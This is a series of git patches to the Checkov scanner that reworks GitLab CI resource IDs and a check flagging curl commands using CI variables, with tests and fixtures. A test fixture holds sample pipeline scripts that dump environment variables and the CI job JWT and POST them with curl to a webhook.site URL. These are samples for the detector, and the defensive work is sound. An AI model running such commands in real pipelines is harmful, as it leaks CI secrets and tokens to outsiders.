From b5da589ab26edad148b51b17a40dbab228c98ad2 Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Wed, 19 Oct 2022 20:14:50 +0300 Subject: [PATCH 01/12] fixing check_ids & resource ids for gitlab ci --- checkov/common/checks/base_check_registry.py | 4 +++ checkov/common/runners/object_runner.py | 3 ++ .../checks/job/SuspectCurlInScript.py | 14 ++++----- checkov/gitlab_ci/runner.py | 30 ++++++++++++++++++ checkov/yaml_doc/base_registry.py | 31 ++++++++++++++++++- tests/gitlab_ci/test_resource_names.py | 20 ++++++++++++ tests/gitlab_ci/test_runner.py | 2 +- 7 files changed, 94 insertions(+), 10 deletions(-) create mode 100644 tests/gitlab_ci/test_resource_names.py diff --git a/checkov/common/checks/base_check_registry.py b/checkov/common/checks/base_check_registry.py index 79b628f2583..344d67a77f1 100644 --- a/checkov/common/checks/base_check_registry.py +++ b/checkov/common/checks/base_check_registry.py @@ -34,6 +34,7 @@ def __init__(self, report_type: str) -> None: self.wildcard_checks: Dict[str, List[BaseCheck]] = defaultdict(list) self.check_id_allowlist: Optional[List[str]] = None self.report_type = report_type + self.definitions_raw: list[tuple[int, str]] | None = None def register(self, check: BaseCheck) -> None: # IMPLEMENTATION NOTE: Checks are registered when the script is loaded @@ -196,3 +197,6 @@ def load_external_checks(self, directory: str) -> None: self.logger.error(f"Cannot load external check '{check_name}' from {check_full_path}", exc_info=True) finally: BaseCheckRegistry.__loading_external_checks = False + + def set_definitions_raw(self, definitions_raw: list[tuple[int, str]]) -> None: + self.definitions_raw = definitions_raw diff --git a/checkov/common/runners/object_runner.py b/checkov/common/runners/object_runner.py index 35e8b071f52..73478a5c6c0 100644 --- a/checkov/common/runners/object_runner.py +++ b/checkov/common/runners/object_runner.py @@ -100,6 +100,9 @@ def run( for file_path in self.definitions.keys(): self.pbar.set_additional_data({'Current File Scanned': os.path.relpath(file_path, root_folder)}) skipped_checks = collect_suppressions_for_context(self.definitions_raw[file_path]) + + if registry.report_type == CheckType.GITLAB_CI: + registry.set_definitions_raw(self.definitions_raw[file_path]) results = registry.scan(file_path, self.definitions[file_path], skipped_checks, runner_filter) # type:ignore[arg-type] # this is overridden in the subclass for key, result in results.items(): result_config = result["results_configuration"] diff --git a/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py b/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py index 3855f673b08..56e819ebb1b 100644 --- a/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py +++ b/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py @@ -1,6 +1,7 @@ from __future__ import annotations - +from typing import Any from checkov.common.models.enums import CheckResult +from checkov.common.util.consts import START_LINE, END_LINE from checkov.gitlab_ci.checks.base_gitlab_ci_check import BaseGitlabCICheck from checkov.yaml_doc.enums import BlockType @@ -17,13 +18,10 @@ def __init__(self) -> None: supported_entities=('*.script[]',) ) - def scan_conf(self, conf: str) -> tuple[CheckResult, str]: # type:ignore[override] - if "curl" in conf: - badstuff = ('curl', '$CI_') - lines = conf.split("\n") - for line in lines: - if all(x in line for x in badstuff): - return CheckResult.FAILED, conf + def scan_conf(self, conf: dict[str, Any]) -> tuple[CheckResult, dict[str, Any]]: + line = conf.get("curl", "") + if '$CI' in line: + return CheckResult.FAILED, conf return CheckResult.PASSED, conf diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index af7449c7d1b..5c2edc17726 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -4,6 +4,7 @@ from typing import TYPE_CHECKING, Any from checkov.common.output.report import Report +from checkov.common.util.consts import START_LINE, END_LINE from checkov.runner_filter import RunnerFilter @@ -45,6 +46,12 @@ def is_workflow_file(self, file_path: str) -> bool: def included_paths(self) -> Iterable[str]: return (".gitlab-ci.yml", ".gitlab-ci.yaml") + def get_resource(self, file_path: str, key: str, supported_entities: Iterable[str], definitions: dict[str, Any] | None = None) -> str: + key_components = key.split('.') + key_without_check_id = '.'.join(key_components[: len(key_components) - 1]) + start_line, end_line = Runner.get_start_and_end_lines(key) + return self.generate_resource_key_recursive(self.definitions[file_path], '', start_line, end_line) + def run( self, root_folder: str | None = None, @@ -91,3 +98,26 @@ def extract_images( images.extend(manager.extract_images_from_workflow()) return images + + @staticmethod + def get_start_and_end_lines(key: str) -> list[int]: + check_name = key.split('.')[-1] + try: + start_end_line_bracket_index = check_name.index('[') + except ValueError: + return [-1, -1] + return [int(x) for x in check_name[start_end_line_bracket_index + 1: len(check_name) - 1].split(':')] + + def generate_resource_key_recursive(self, conf: dict[str, Any] | list[str] | str, key: str, start_line: int, end_line: int) -> str: + if not isinstance(conf, dict): + return key + + for k, value in conf.items(): + if k == START_LINE or k == END_LINE: + continue + if not isinstance(value, dict): + return f'{key}.{k}' if key else k + if value[START_LINE] <= start_line <= end_line <= value[END_LINE]: + return self.generate_resource_key_recursive(value, f'{key}.{k}' if key else k, start_line, end_line) + + return key diff --git a/checkov/yaml_doc/base_registry.py b/checkov/yaml_doc/base_registry.py index a7386d9942c..b6f0e28603b 100644 --- a/checkov/yaml_doc/base_registry.py +++ b/checkov/yaml_doc/base_registry.py @@ -44,10 +44,13 @@ def _scan_yaml_array( ) if isinstance(analyzed_entities, list): for item in analyzed_entities: + item_dict = item + if isinstance(item, str): + item_dict = self.set_lines_for_item(item) if STARTLINE_MARK != item and ENDLINE_MARK != item: self.update_result( check, - item, + item_dict, entity_type, entity_type, results, @@ -253,3 +256,29 @@ def get_result_key(self, check: BaseCheck, def extract_entity_details(self, entity: dict[str, Any]) -> tuple[str, str, dict[str, Any]]: # not used, but is an abstractmethod pass + + def set_lines_for_item(self, item: str) -> dict[str, Any]: + item_lines = item.rstrip().split("\n") + first_line, last_line = item_lines[0], item_lines[-1] + + is_single_line = True if len(item_lines) == 1 else False + + first_item_componenets = first_line.split() + item_dict = { + first_item_componenets[0]: ' '.join(first_item_componenets[1:]) + } + + for idx, line in self.definitions_raw: + if first_line in line: + item_dict[STARTLINE_MARK] = idx + if is_single_line: + item_dict[ENDLINE_MARK] = idx + break + + if last_line in line: + item_dict[ENDLINE_MARK] = idx + break + + return item_dict + + diff --git a/tests/gitlab_ci/test_resource_names.py b/tests/gitlab_ci/test_resource_names.py new file mode 100644 index 00000000000..a9edda33ab9 --- /dev/null +++ b/tests/gitlab_ci/test_resource_names.py @@ -0,0 +1,20 @@ +import pytest + +from checkov.gitlab_ci.runner import Runner + + +@pytest.mark.parametrize( + "key,file_path,expected_key", + [ + ('*.script[].*.script[].CKV_GITLABCI_1', 'checkov/tests/gitlab_ci/resources/images/.gitlab-ci.yml', + '.gitlab-ci.yml/*.script[].*.script[]'), + ('*.rules.*.rules.CKV_GITLABCI_2[4:9]', 'checkov/tests/gitlab_ci/resources/two/.gitlab-ci.yaml', + '.gitlab-ci.yaml/*.rules.*.rules'), + ], +) +def test_get_resource(key, file_path, expected_key): + runner = Runner() + + new_key = runner.get_resource(file_path, key, [], {}) + + assert new_key == expected_key diff --git a/tests/gitlab_ci/test_runner.py b/tests/gitlab_ci/test_runner.py index bd7156a2cfd..bb9b617f494 100644 --- a/tests/gitlab_ci/test_runner.py +++ b/tests/gitlab_ci/test_runner.py @@ -17,7 +17,7 @@ def test_runner(self): checks = ["CKV_GITLABCI_1","CKV_GITLABCI_2"] report = runner.run( root_folder=valid_dir_path, - runner_filter=RunnerFilter(framework='github_ci', checks=checks) + runner_filter=RunnerFilter(framework=['gitlab_ci'], checks=checks) ) self.assertEqual(len(report.failed_checks), 5) self.assertEqual(report.parsing_errors, []) From 1d117f7ab3bc12bb427ef6cd3fe8203d8201a007 Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 11:40:59 +0300 Subject: [PATCH 02/12] adding tests & fixes in resource ids --- .../checks/job/SuspectCurlInScript.py | 9 +- checkov/gitlab_ci/common/resource_id_utils.py | 20 +++ .../gitlab_ci/image_referencer/provider.py | 5 + checkov/gitlab_ci/runner.py | 24 +-- checkov/yaml_doc/base_registry.py | 10 +- tests/gitlab_ci/conftest.py | 167 ++++++++++++++++++ tests/gitlab_ci/test_resource_names.py | 28 ++- tests/gitlab_ci/test_runner.py | 2 +- 8 files changed, 232 insertions(+), 33 deletions(-) create mode 100644 checkov/gitlab_ci/common/resource_id_utils.py create mode 100644 tests/gitlab_ci/conftest.py diff --git a/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py b/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py index 56e819ebb1b..d48ffc2f9ba 100644 --- a/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py +++ b/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py @@ -1,7 +1,6 @@ from __future__ import annotations from typing import Any from checkov.common.models.enums import CheckResult -from checkov.common.util.consts import START_LINE, END_LINE from checkov.gitlab_ci.checks.base_gitlab_ci_check import BaseGitlabCICheck from checkov.yaml_doc.enums import BlockType @@ -19,9 +18,11 @@ def __init__(self) -> None: ) def scan_conf(self, conf: dict[str, Any]) -> tuple[CheckResult, dict[str, Any]]: - line = conf.get("curl", "") - if '$CI' in line: - return CheckResult.FAILED, conf + for line in conf.values(): + if not isinstance(line, str): + continue + if line.startswith("curl") and "$CI" in line: + return CheckResult.FAILED, conf return CheckResult.PASSED, conf diff --git a/checkov/gitlab_ci/common/resource_id_utils.py b/checkov/gitlab_ci/common/resource_id_utils.py new file mode 100644 index 00000000000..20d4d28bbb6 --- /dev/null +++ b/checkov/gitlab_ci/common/resource_id_utils.py @@ -0,0 +1,20 @@ +from __future__ import annotations +from typing import Any + +from checkov.common.util.consts import START_LINE, END_LINE + + +def generate_resource_key_recursive(conf: dict[str, Any] | list[str] | str, key: str, start_line: int, + end_line: int) -> str: + if not isinstance(conf, dict): + return key + + for k, value in conf.items(): + if k == START_LINE or k == END_LINE or isinstance(value, str): + continue + elif isinstance(value, list): + return f'{key}.{k}' if key else k + elif value[START_LINE] <= start_line <= end_line <= value[END_LINE]: + return generate_resource_key_recursive(value, f'{key}.{k}' if key else k, start_line, end_line) + + return key diff --git a/checkov/gitlab_ci/image_referencer/provider.py b/checkov/gitlab_ci/image_referencer/provider.py index fb5d1cbcb83..b1d7c9a333b 100644 --- a/checkov/gitlab_ci/image_referencer/provider.py +++ b/checkov/gitlab_ci/image_referencer/provider.py @@ -3,6 +3,7 @@ from typing import Any from checkov.common.images.image_referencer import Image +from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive class GitlabCiProvider: @@ -43,6 +44,8 @@ def extract_images_from_workflow(self) -> list[Image]: name=image_name, start_line=start_line, end_line=end_line, + related_resource_id=generate_resource_key_recursive(self.workflow_config, '', + start_line, end_line) ) images.append(image_obj) image_name = "" @@ -52,6 +55,8 @@ def extract_images_from_workflow(self) -> list[Image]: name=image_name, start_line=start_line, end_line=end_line, + related_resource_id=generate_resource_key_recursive(self.workflow_config, '', + start_line, end_line) ) images.append(image_obj) return images diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index 5c2edc17726..3333687b4ea 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -4,7 +4,7 @@ from typing import TYPE_CHECKING, Any from checkov.common.output.report import Report -from checkov.common.util.consts import START_LINE, END_LINE +from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive from checkov.runner_filter import RunnerFilter @@ -47,10 +47,9 @@ def included_paths(self) -> Iterable[str]: return (".gitlab-ci.yml", ".gitlab-ci.yaml") def get_resource(self, file_path: str, key: str, supported_entities: Iterable[str], definitions: dict[str, Any] | None = None) -> str: - key_components = key.split('.') - key_without_check_id = '.'.join(key_components[: len(key_components) - 1]) start_line, end_line = Runner.get_start_and_end_lines(key) - return self.generate_resource_key_recursive(self.definitions[file_path], '', start_line, end_line) + resource_id: str = generate_resource_key_recursive(self.definitions[file_path], '', start_line, end_line) + return resource_id def run( self, @@ -104,20 +103,9 @@ def get_start_and_end_lines(key: str) -> list[int]: check_name = key.split('.')[-1] try: start_end_line_bracket_index = check_name.index('[') + closing_bracket_index = check_name.index(']') + if closing_bracket_index - start_end_line_bracket_index == 1: + return [-1, -1] except ValueError: return [-1, -1] return [int(x) for x in check_name[start_end_line_bracket_index + 1: len(check_name) - 1].split(':')] - - def generate_resource_key_recursive(self, conf: dict[str, Any] | list[str] | str, key: str, start_line: int, end_line: int) -> str: - if not isinstance(conf, dict): - return key - - for k, value in conf.items(): - if k == START_LINE or k == END_LINE: - continue - if not isinstance(value, dict): - return f'{key}.{k}' if key else k - if value[START_LINE] <= start_line <= end_line <= value[END_LINE]: - return self.generate_resource_key_recursive(value, f'{key}.{k}' if key else k, start_line, end_line) - - return key diff --git a/checkov/yaml_doc/base_registry.py b/checkov/yaml_doc/base_registry.py index b6f0e28603b..c18cfb1c6bc 100644 --- a/checkov/yaml_doc/base_registry.py +++ b/checkov/yaml_doc/base_registry.py @@ -257,15 +257,17 @@ def extract_entity_details(self, entity: dict[str, Any]) -> tuple[str, str, dict # not used, but is an abstractmethod pass - def set_lines_for_item(self, item: str) -> dict[str, Any]: + def set_lines_for_item(self, item: str) -> dict[int | str, str | int] | str: + if not self.definitions_raw: + return item + item_lines = item.rstrip().split("\n") first_line, last_line = item_lines[0], item_lines[-1] is_single_line = True if len(item_lines) == 1 else False - first_item_componenets = first_line.split() - item_dict = { - first_item_componenets[0]: ' '.join(first_item_componenets[1:]) + item_dict: dict[int | str, str | int] = { + idx: line for idx, line in enumerate(item_lines) } for idx, line in self.definitions_raw: diff --git a/tests/gitlab_ci/conftest.py b/tests/gitlab_ci/conftest.py new file mode 100644 index 00000000000..6e1cb9cb3ff --- /dev/null +++ b/tests/gitlab_ci/conftest.py @@ -0,0 +1,167 @@ +from typing import Any + +import pytest + + +@pytest.fixture +def definitions() -> dict[str, Any]: + return { + "/checkov/tests/gitlab_ci/resources/images/.gitlab-ci.yml": { + "default": { + "image": "nginx:1.18", + "services": [ + { + "name": "privateregistry/stuff/my-postgres:11.7", + "alias": "db-postgres", + "__startline__": 9, + "__endline__": 11 + }, + { + "name": "redis:latest", + "__startline__": 11, + "__endline__": 12 + }, + "nginx:1.17" + ], + "before_script": [ + "bundle install" + ], + "__startline__": 2, + "__endline__": 17 + }, + "test": { + "script": [ + "docker run privateregistry/stuff/myimage:11.7" + ], + "__startline__": 18, + "__endline__": 21 + }, + "baddeploy": { + "script": [ + "echo \"get the envs\"\napt update\napt -y install curl\npython -c \u0027import json, os;print(json.dumps(dict(os.environ)))\u0027 \u003e env.json\ncurl -H \\\"Content-Type: application/json\\\" -X POST --data \"$CI_JOB_JWT_V1\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826\ncurl -H \\\"Content-Type: application/json\\\" -X POST --data \"@env.json\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826\n" + ], + "__startline__": 22, + "__endline__": 32 + }, + "__startline__": 1, + "__endline__": 32 + }, + "/checkov/tests/gitlab_ci/resources/curl/.gitlab-ci.yml": { + "image": "python:3.9-buster", + "test": { + "script": [ + "echo \"get the envs\"\napt update\napt -y install curl\npython -c \u0027import json, os;print(json.dumps(dict(os.environ)))\u0027 \u003e env.json\ncurl -H \\\"Content-Type: application/json\\\" -X POST --data \"@env.json\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826\n" + ], + "__startline__": 4, + "__endline__": 12 + }, + "deploy": { + "script": "curl -H \\\"Content-Type: application/json\\\" -X POST --data \"$CI_JOB_JWT_V1\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826", + "__startline__": 13, + "__endline__": 13 + }, + "__startline__": 1, + "__endline__": 13 + }, + "/checkov/tests/gitlab_ci/resources/two/.gitlab-ci.yml": { + "planOnlySubset": { + "script": "echo \"This job creates double pipelines!\"", + "rules": [ + { + "changes": [ + "$DOCKERFILES_DIR/*" + ], + "__startline__": 4, + "__endline__": 6 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", + "__startline__": 6, + "__endline__": 7 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", + "__startline__": 7, + "__endline__": 9 + } + ], + "__startline__": 2, + "__endline__": 9 + }, + "job": { + "script": "echo \"This job also creates double pipelines!\"", + "rules": [ + { + "changes": [ + "$DOCKERFILES_DIR/*" + ], + "__startline__": 12, + "__endline__": 14 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", + "__startline__": 14, + "__endline__": 15 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", + "__startline__": 15, + "__endline__": 16 + } + ], + "__startline__": 10, + "__endline__": 16 + }, + "__startline__": 1, + "__endline__": 16 + }, + "/checkov/tests/gitlab_ci/resources/rules/.gitlab-ci.yml": { + "job": { + "script": "echo \"This job creates double pipelines!\"", + "rules": [ + { + "changes": [ + "$DOCKERFILES_DIR/*" + ], + "__startline__": 4, + "__endline__": 6 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", + "__startline__": 6, + "__endline__": 7 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", + "__startline__": 7, + "__endline__": 9 + } + ], + "__startline__": 2, + "__endline__": 9 + }, + "__startline__": 1, + "__endline__": 9 + }, + "/checkov/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml": { + "default": { + "image": { + "name": "redis:latest", + "entrypoint": [ + "/bin/bash" + ], + "__startline__": 3, + "__endline__": 6 + }, + "__startline__": 2, + "__endline__": 6 + }, + "deploy": { + "script": "curl -H \\\"Content-Type: application/json\\\" -X POST --data \"$CI_JOB_JWT_V1\" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826", + "__startline__": 7, + "__endline__": 7 + }, + "__startline__": 1, + "__endline__": 7 + } + } diff --git a/tests/gitlab_ci/test_resource_names.py b/tests/gitlab_ci/test_resource_names.py index a9edda33ab9..cff69e19735 100644 --- a/tests/gitlab_ci/test_resource_names.py +++ b/tests/gitlab_ci/test_resource_names.py @@ -6,15 +6,31 @@ @pytest.mark.parametrize( "key,file_path,expected_key", [ - ('*.script[].*.script[].CKV_GITLABCI_1', 'checkov/tests/gitlab_ci/resources/images/.gitlab-ci.yml', - '.gitlab-ci.yml/*.script[].*.script[]'), - ('*.rules.*.rules.CKV_GITLABCI_2[4:9]', 'checkov/tests/gitlab_ci/resources/two/.gitlab-ci.yaml', - '.gitlab-ci.yaml/*.rules.*.rules'), + ('*.script[].*.script[].CKV_GITLABCI_1[19:19]', '/checkov/tests/gitlab_ci/resources/images/.gitlab-ci.yml', + 'test.script'), + ('*.rules.*.rules.CKV_GITLABCI_2[7:9]', '/checkov/tests/gitlab_ci/resources/two/.gitlab-ci.yml', + 'planOnlySubset.rules'), ], ) -def test_get_resource(key, file_path, expected_key): +def test_get_resource(key, file_path, expected_key, definitions): runner = Runner() - + runner.definitions = definitions new_key = runner.get_resource(file_path, key, [], {}) assert new_key == expected_key + + +@pytest.mark.parametrize( + "key,expected_start_line,expected_end_line", + [ + ("*.script[].*.script[].CKV_GITLABCI_1[19:19]", 19, 19), + ("*.rules.*.rules.CKV_GITLABCI_2[7:9]", 7, 9), + ("*.script[].CKV_GITLABCI_1", -1, -1) + ] +) +def test_get_start_and_end_lines(key, expected_start_line, expected_end_line): + runner = Runner() + start_line, end_line = runner.get_start_and_end_lines(key) + + assert start_line == expected_start_line + assert end_line == expected_end_line diff --git a/tests/gitlab_ci/test_runner.py b/tests/gitlab_ci/test_runner.py index bb9b617f494..c4a3c67905c 100644 --- a/tests/gitlab_ci/test_runner.py +++ b/tests/gitlab_ci/test_runner.py @@ -21,7 +21,7 @@ def test_runner(self): ) self.assertEqual(len(report.failed_checks), 5) self.assertEqual(report.parsing_errors, []) - self.assertEqual(len(report.passed_checks), 2) + self.assertEqual(len(report.passed_checks), 5) self.assertEqual(report.skipped_checks, []) report.print_console() From 834886391551255754135c099b7b7a554514ee96 Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 12:21:20 +0300 Subject: [PATCH 03/12] fixing ids & tests --- checkov/gitlab_ci/common/resource_id_utils.py | 12 +- checkov/gitlab_ci/runner.py | 2 +- .../test_gitlab_ci_provider.py | 122 ++++++++++-------- .../image_referencer/test_manager.py | 52 +++++--- .../gitlab_ci/resources/images/.gitlab-ci.yml | 2 - 5 files changed, 115 insertions(+), 75 deletions(-) diff --git a/checkov/gitlab_ci/common/resource_id_utils.py b/checkov/gitlab_ci/common/resource_id_utils.py index 20d4d28bbb6..771fb590ff7 100644 --- a/checkov/gitlab_ci/common/resource_id_utils.py +++ b/checkov/gitlab_ci/common/resource_id_utils.py @@ -10,11 +10,13 @@ def generate_resource_key_recursive(conf: dict[str, Any] | list[str] | str, key: return key for k, value in conf.items(): - if k == START_LINE or k == END_LINE or isinstance(value, str): - continue - elif isinstance(value, list): - return f'{key}.{k}' if key else k - elif value[START_LINE] <= start_line <= end_line <= value[END_LINE]: + if isinstance(value, dict) and value[START_LINE] <= start_line <= end_line <= value[END_LINE]: return generate_resource_key_recursive(value, f'{key}.{k}' if key else k, start_line, end_line) + # if k == START_LINE or k == END_LINE or isinstance(value, str): + # continue + if isinstance(value, list): + return f'{key}.{k}' if key else k + if isinstance(value, str): + return key return key diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index 3333687b4ea..016e4555e39 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -75,7 +75,7 @@ def run( ) if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list + return [report, image_report] return report diff --git a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py b/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py index 9e683adf76d..b82fde03957 100644 --- a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py +++ b/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py @@ -5,80 +5,100 @@ def test_extract_images_from_workflow(): file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' workflow_config = { - "default": { - "image": "nginx:1.18", - "services": [ - { - "name": "redis:latest", - "__startline__": 11, - "__endline__": 12 - }, - "nginx:1.17" - ], - "before_script": [ - "bundle install" + "default": { + "image": { + "name": "ruby:2.6", + "entrypoint": [ + "/bin/bash" ], - "__startline__": 2, - "__endline__": 17 - }, - "__startline__": 1, - "__endline__": 32 - } + "__startline__": 3, + "__endline__": 6 + }, + "services": [ + { + "name": "privateregistry/stuff/my-postgres:11.7", + "alias": "db-postgres", + "__startline__": 7, + "__endline__": 9 + }, + { + "name": "redis:latest", + "__startline__": 9, + "__endline__": 10 + }, + "nginx:1.17" + ], + "before_script": [ + "bundle install" + ], + "__startline__": 2, + "__endline__": 15 + }, + "__startline__": 1, + "__endline__": 32 + } gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) images = gitlab_ci_provider.extract_images_from_workflow() - assert images == [ + assert set(images) == { Image( - end_line=17, - start_line=2, + end_line=6, + start_line=3, file_path=file_path, - name='nginx:1.18', - related_resource_id=None + name='ruby:2.6', + related_resource_id='default.image' ), Image( - end_line=12, - start_line=11, + end_line=10, + start_line=9, file_path=file_path, name='redis:latest', - related_resource_id=None + related_resource_id='default.services' ), Image( - end_line=12, - start_line=11, + end_line=10, + start_line=9, file_path=file_path, name='nginx:1.17', - related_resource_id=None + related_resource_id='default.services' + ), + Image( + end_line=9, + start_line=7, + file_path=file_path, + name='privateregistry/stuff/my-postgres:11.7', + related_resource_id='default.services' ) - ] + } def test_extract_images_from_workflow_no_images(): file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml' workflow_config = { - "script": "echo \"This job creates double pipelines!\"", - "rules": [ - { - "changes": [ + "script": "echo \"This job creates double pipelines!\"", + "rules": [ + { + "changes": [ "$DOCKERFILES_DIR/*" - ], - "__startline__": 4, - "__endline__": 6 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", - "__startline__": 6, - "__endline__": 7 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", - "__startline__": 7, - "__endline__": 9 - } - ], - "__startline__": 2, - "__endline__": 9 + ], + "__startline__": 4, + "__endline__": 6 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", + "__startline__": 6, + "__endline__": 7 + }, + { + "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"merge_request_event\"", + "__startline__": 7, + "__endline__": 9 } + ], + "__startline__": 2, + "__endline__": 9 + } gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) images = gitlab_ci_provider.extract_images_from_workflow() diff --git a/tests/gitlab_ci/image_referencer/test_manager.py b/tests/gitlab_ci/image_referencer/test_manager.py index 6ef1b1343de..05c19c4ec86 100644 --- a/tests/gitlab_ci/image_referencer/test_manager.py +++ b/tests/gitlab_ci/image_referencer/test_manager.py @@ -6,12 +6,25 @@ def test_extract_images_from_workflow(): file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' workflow_config = { "default": { - "image": "nginx:1.18", + "image": { + "name": "ruby:2.6", + "entrypoint": [ + "/bin/bash" + ], + "__startline__": 3, + "__endline__": 6 + }, "services": [ + { + "name": "privateregistry/stuff/my-postgres:11.7", + "alias": "db-postgres", + "__startline__": 7, + "__endline__": 9 + }, { "name": "redis:latest", - "__startline__": 11, - "__endline__": 12 + "__startline__": 9, + "__endline__": 10 }, "nginx:1.17" ], @@ -19,7 +32,7 @@ def test_extract_images_from_workflow(): "bundle install" ], "__startline__": 2, - "__endline__": 17 + "__endline__": 15 }, "__startline__": 1, "__endline__": 32 @@ -28,29 +41,36 @@ def test_extract_images_from_workflow(): manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path) images = manager.extract_images_from_workflow() - assert images == [ + assert set(images) == { Image( - end_line=17, - start_line=2, + end_line=6, + start_line=3, file_path=file_path, - name='nginx:1.18', - related_resource_id=None + name='ruby:2.6', + related_resource_id='default.image' ), Image( - end_line=12, - start_line=11, + end_line=10, + start_line=9, file_path=file_path, name='redis:latest', - related_resource_id=None + related_resource_id='default.services' ), Image( - end_line=12, - start_line=11, + end_line=10, + start_line=9, file_path=file_path, name='nginx:1.17', - related_resource_id=None + related_resource_id='default.services' + ), + Image( + end_line=9, + start_line=7, + file_path=file_path, + name='privateregistry/stuff/my-postgres:11.7', + related_resource_id='default.services' ) - ] + } def test_extract_images_from_workflow_no_images(): diff --git a/tests/gitlab_ci/resources/images/.gitlab-ci.yml b/tests/gitlab_ci/resources/images/.gitlab-ci.yml index 08d7a08e1c1..4eaf8c17ee3 100644 --- a/tests/gitlab_ci/resources/images/.gitlab-ci.yml +++ b/tests/gitlab_ci/resources/images/.gitlab-ci.yml @@ -3,8 +3,6 @@ default: name: ruby:2.6 entrypoint: ["/bin/bash"] - image: nginx:1.18 - services: - name: privateregistry/stuff/my-postgres:11.7 alias: db-postgres From fd7752fd8c4b327ffa1e6aeba033dc2adc2e4a63 Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 12:22:58 +0300 Subject: [PATCH 04/12] remove commented code --- checkov/gitlab_ci/common/resource_id_utils.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/checkov/gitlab_ci/common/resource_id_utils.py b/checkov/gitlab_ci/common/resource_id_utils.py index 771fb590ff7..8a0db1e8d45 100644 --- a/checkov/gitlab_ci/common/resource_id_utils.py +++ b/checkov/gitlab_ci/common/resource_id_utils.py @@ -12,8 +12,6 @@ def generate_resource_key_recursive(conf: dict[str, Any] | list[str] | str, key: for k, value in conf.items(): if isinstance(value, dict) and value[START_LINE] <= start_line <= end_line <= value[END_LINE]: return generate_resource_key_recursive(value, f'{key}.{k}' if key else k, start_line, end_line) - # if k == START_LINE or k == END_LINE or isinstance(value, str): - # continue if isinstance(value, list): return f'{key}.{k}' if key else k if isinstance(value, str): From 971b05bcd497f5713358f5ce83d8a6b4667c9f17 Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 12:27:17 +0300 Subject: [PATCH 05/12] fix typing --- checkov/gitlab_ci/runner.py | 2 +- tests/gitlab_ci/conftest.py | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index 016e4555e39..3333687b4ea 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -75,7 +75,7 @@ def run( ) if image_report: - return [report, image_report] + return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list return report diff --git a/tests/gitlab_ci/conftest.py b/tests/gitlab_ci/conftest.py index 6e1cb9cb3ff..e86bb9b1a68 100644 --- a/tests/gitlab_ci/conftest.py +++ b/tests/gitlab_ci/conftest.py @@ -1,3 +1,4 @@ +from __future__ import annotations from typing import Any import pytest From aa23c8c830a14729fc108758de875f7fe37d178b Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 12:29:06 +0300 Subject: [PATCH 06/12] lint --- checkov/yaml_doc/base_registry.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/checkov/yaml_doc/base_registry.py b/checkov/yaml_doc/base_registry.py index c18cfb1c6bc..10eb968e614 100644 --- a/checkov/yaml_doc/base_registry.py +++ b/checkov/yaml_doc/base_registry.py @@ -282,5 +282,3 @@ def set_lines_for_item(self, item: str) -> dict[int | str, str | int] | str: break return item_dict - - From 4d9cb8527e42a9827b04e6014dba0da6fd22b80a Mon Sep 17 